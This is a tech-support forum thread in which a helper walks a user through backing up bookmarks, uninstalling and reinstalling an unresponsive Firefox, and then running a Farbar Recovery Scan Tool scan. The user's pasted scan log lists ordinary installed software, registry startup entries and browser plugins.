 
Before proceeding, please refer to the following instructions on how you can backup your Favourites/Bookmarks.

Using the relevant instructions below, please reset your installed browsers.


I can't do that. As you see in the pic above, everything is blank and I can't even click settings etc. 

This started happening after I reset Firefox the other day. A folder popped up on my desktop, "Gamle Firefox-data" (Old Firefox data) after doing so, is it possible this might have to do with it? I'm afraid of deleting it in case that means deleting all settings etc.


Hello, 
 

A folder popped up on my desktop, "Gamle Firefox-data" (Old Firefox data) after doing so, is it possible this might have to do with it? I'm afraid of deleting it in case that means deleting all settings etc.

This is normal. See here: 
https://support.mozilla.org/en-US/kb/refresh-firefox-reset-add-ons-and-settings
 
At this point in time, uninstalling and reinstalling Firefox appears to be the best method to restore functionality.
 
STEP 1
Backup Firefox Bookmarks and Saved Logins

  • Please download and install Google Chrome.
  • Open Chrome. Click Settings, followed by Bookmarks, followed by Import bookmarks and settings....
  • Select Mozilla Firefox in the dropdown menu and the items you wish to import. Click Import.
  • Before moving onto Step 2, please confirm your bookmarks/saved logins were successfully imported into Chrome.
     

STEP 2
Revo Uninstaller

  • Please download and install Revo Uninstaller.
  • Double-Click Revo Uninstaller to run the programme. 
  • From the list of programmes, locate the following, or anything similar and carry out the steps below one at a time.
    • Mozilla Firefox
  • Double-Click the programme. 
  • When prompted if you want to uninstall click Yes.
  • Ensure the Moderate option is selected and click Next.
  • The programme uninstaller will run. If prompted again click Yes.
  • Work your way through the uninstaller, ensuring you read each page thoroughly.
  • Note: If you are offered the choice to install additional software, ensure you decline.
  • Once the built-in uninstaller is finished click Next.
  • Once the programme has searched for leftovers click Next.
  • Check items in bold only in the list and click Delete. You may have to expand folders by clicking the "+" mark.
  • When prompted click Yes, followed by Next.
  • Click Select all, followed by Delete.
  • When prompted click Yes, followed by Next.
  • Upon completion, click Finish.
  • In your next reply, confirm you were successful in uninstalling all programmes listed above. 
     

STEP 3
Restore Firefox Bookmarks and Saved Logins

  • Please download and install Mozilla Firefox.
  • Open Firefox. Press Ctrl Shift on your keyboard at the same time.
  • Click Import and Backup, followed by Import Data from Another Browser....
  • Select Chrome and click Next.
  • Select the items you wish to restore, click Next and follow the prompts to complete the import. 

 

 

In your next reply, confirm you were successful in uninstalling all programmes listed above. 

Not sure if this is supposed to be before or after I install again. Not in a hurry, so I'll leave this here until you've said so ;)

Yes, it was successful - I got my bookmarks in Chrome now, and Firefox is gone. 


Okay. :) Now that Firefox has been removed using Revo, and your bookmarks backed up in Chrome, try reinstalling Firefox. 

 

Let me know if you are able to install the browser, and if normal functionality is restored.

It's not, sadly. It's still the same problem. It actually loaded this time tho, but I still can't click anything. The only places I can click is like, the 3 in the corner - minimize, the other thing and "X".

Again tho, holding over stuff shows the info-box thing that would usually come up. It just doesn't have the "box" around (Pic below from Chrome to show what I mean), and clicking does nothing.

Pic to show the "boxes" Im talking about: http://i.imgur.com/BMsYelI.jpg?1


Hello, 
 

It gets blocked by SkyHunter 4)

I assume you mean SpyHunter 4. When did you install this software? It was not present when you initially posted. 
 

It's not, sadly. It's still the same problem. It actually loaded this time tho, but I still can't click anything. The only places I can click is like, the 3 in the corner - minimize, the other thing and "X".

Okay. Let's get a fresh set of FRST logs.
 
Farbar Recovery Scan Tool (FRST) Scan

  • Right-Click FRST64.exe and select Run as administrator to run the programme.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply. 

Right, damn. Yes, I believe I installed it right after I first posted or something. As I was after all getting the viruses while I had Avast (Which I still do have tho.), I thought I'd just buy SpyHunter which I saw someone recommend somewhere. Sorry if I should not have done that in the process or should have said so. 

FRST.txt
 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:21-02-2016

Ran by Eirik (administrator) on NINJA (27-02-2016 02:11:27)
Running from C:\Users\Eirik\Desktop
Loaded Profiles: Eirik &  (Available Profiles: Eirik)
Platform: Windows 8.1 0(X64) Language: Norsk, bokmål (Norge)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\SCM\MSIService.exe
(MSI) C:\Program Files (x86)\MSI\Super-Charger\ChargeService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
() C:\Program Files\Qualcomm Atheros\Killer Network Manager\BFNService.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(LogMeIn Inc.) C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
() C:\Windows\System32\igfxTray.exe
(Wacom Technology) C:\Program Files\Tablet\Pen\WacomHost.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_Tablet.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Atheros Communications) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
() C:\Program Files (x86)\Bluetooth Suite\ActivateDesktop.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(MSI) C:\Program Files (x86)\SCM\Radio Manager.exe
(MSI) C:\Program Files (x86)\SCM\SCM.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Spotify Ltd) C:\Users\Eirik\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Dropbox, Inc.) C:\Users\Eirik\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Micro-Star International Co., Ltd.) C:\Program Files (x86)\MSI\KLM\KLM.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Sound Blaster Cinema\Sound Blaster Cinema\SBCinema.exe
(MSI) C:\Program Files (x86)\MSI\Super-Charger\Super-Charger.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
(BlueStack Systems, Inc.) C:\Program Files (x86)\BlueStacks\HD-Agent.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13513288 2013-04-24] (Realtek Semiconductor)
HKLM\...\Run: [iAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [286704 2013-03-22] (Intel Corporation)
HKLM\...\Run: [Radio Manager] => C:\Program Files (x86)\SCM\Radio Manager.exe [406920 2013-04-18] (MSI)
HKLM\...\Run: [sCM] => C:\Program Files (x86)\SCM\SCM.exe [407968 2013-04-18] (MSI)
HKLM\...\Run: [MBCfg64] => C:\Windows\system32\RunDLL32.exe C:\Windows\system32\MBCfg64.dll,RunDLLEntry MBCfg64
HKLM\...\Run: [igfxTray] => C:\Windows\system32\igfxtray.exe [455784 2014-09-05] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [shadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2787264 2016-01-12] (NVIDIA Corporation)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [15033976 2015-11-20] (Logitech Inc.)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2773232 2015-12-01] (Synaptics Incorporated)
HKLM-x32\...\Run: [KLM] => C:\Program Files (x86)\MSI\KLM\KLM.exe [1564040 2013-04-22] (Micro-Star International Co., Ltd.)
HKLM-x32\...\Run: [sound Blaster Cinema] => C:\Program Files (x86)\Creative\Sound Blaster Cinema\Sound Blaster Cinema\SBCinema.exe [711680 2012-11-29] (Creative Technology Ltd)
HKLM-x32\...\Run: [updReg] => C:\Windows\UpdReg.EXE
HKLM-x32\...\Run: [super-Charger] => C:\Program Files (x86)\MSI\Super-Charger\Super-Charger.exe [490480 2013-02-07] (MSI)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-29] (CyberLink Corp.)
HKLM-x32\...\Run: [blueStacks Agent] => c:\Program Files (x86)\BlueStacks\HD-Agent.exe [597880 2013-01-07] (BlueStack Systems, Inc.)
HKLM-x32\...\Run: [switchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [amd_dc_opt] => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)
HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe [5565448 2015-11-12] (LogMeIn Inc.)
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [7021880 2016-01-20] (AVAST Software)
HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595504 2016-01-29] (Oracle Corporation)
HKLM\...\Policies\Explorer\Run: [btvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [132736 2013-02-26] (Atheros Communications)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\...\Run: [Dropbox Update] => C:\Users\Eirik\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-18] (Dropbox, Inc.)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\...\Run: [spotify Web Helper] => C:\Users\Eirik\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1524336 2016-02-26] (Spotify Ltd)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Dropbox Update] => C:\Users\Eirik\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-18] (Dropbox, Inc.)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [spotify Web Helper] => C:\Users\Eirik\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1524336 2016-02-26] (Spotify Ltd)
HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8590760 2015-12-08] (Piriform Ltd)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [175368 2016-01-23] (NVIDIA Corporation)
AppInit_DLLs: , C:\WINDOWS\system32\nvinitx.dll => C:\WINDOWS\system32\nvinitx.dll [175368 2016-01-23] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\WINDOWS\SysWOW64\nvinit.dll => C:\WINDOWS\SysWOW64\nvinit.dll [153392 2016-01-23] (NVIDIA Corporation)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-01-20] (AVAST Software)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt64.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-23] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-23] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-23] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt.33.dll [2016-02-16] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Eirik\AppData\Roaming\Dropbox\bin\DropboxExt.33.dll [2016-02-16] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Qualcomm Atheros Killer Network Manager.lnk [2013-04-24]
ShortcutTarget: Qualcomm Atheros Killer Network Manager.lnk -> C:\Program Files\Qualcomm Atheros\Killer Network Manager\KillerNetManager.exe ()
Startup: C:\Users\Eirik\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2016-02-18]
ShortcutTarget: Dropbox.lnk -> C:\Users\Eirik\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\..\Interfaces\{9DBBD578-1F2D-49B3-AF19-9BA3EA7169DF}: [DhcpNameServer] 193.213.112.4 130.67.15.198
 
Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?pc=AV01
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
HKU\S-1-5-21-730552332-2537374774-3045828507-1002\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.msn.com/?pc=AV01
HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.msn.com/?pc=AV01
SearchScopes: HKLM -> DefaultScope {C20F2EF6-44CE-4E46-8912-DE1A7605CD4B} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKLM-x32 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKU\S-1-5-21-730552332-2537374774-3045828507-1002 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
SearchScopes: HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-02-23] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-01-20] (AVAST Software)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-02-23] (Microsoft Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-02-23] (Microsoft Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\ssv.dll [2016-02-13] (Oracle Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-01-20] (AVAST Software)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-02-23] (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\jp2ssv.dll [2016-02-13] (Oracle Corporation)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2016-02-23] (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2014-05-02] (Skype Technologies)
 
FireFox:
========
FF ProfilePath: C:\Users\Eirik\AppData\Roaming\Mozilla\Firefox\Profiles\x56ct6fm.Standardbruker
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-10] ()
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-10] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=3.0.72 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-03-12] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-03-12] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\dtplugin\npDeployJava1.dll [2016-02-13] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.74.2 -> C:\Program Files (x86)\Java\jre1.8.0_74\bin\plugin2\npjp2.dll [2016-02-13] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-02-23] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2016-02-23] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-13] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-01-23] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-01-23] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-21] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-21] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-01-21] (VideoLAN)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.2 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-730552332-2537374774-3045828507-1002: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Eirik\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-01-23] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-730552332-2537374774-3045828507-1002: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF Plugin HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Eirik\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-01-23] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-730552332-2537374774-3045828507-1002-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2012-05-23] (Wacom)
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-01-22]
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-01-22]
 
Chrome: 
=======
CHR Profile: C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-05]
CHR Extension: (Google Drive) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-25]
CHR Extension: (YouTube) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-20]
CHR Extension: (Google Search) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-04]
CHR Extension: (Google Sheets) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-22]
CHR Extension: (Google Docs Offline) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-23]
CHR Extension: (Chrome Nettmarked-betalinger) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-25]
CHR Extension: (Gmail) - C:\Users\Eirik\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-29]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-01-20]
 
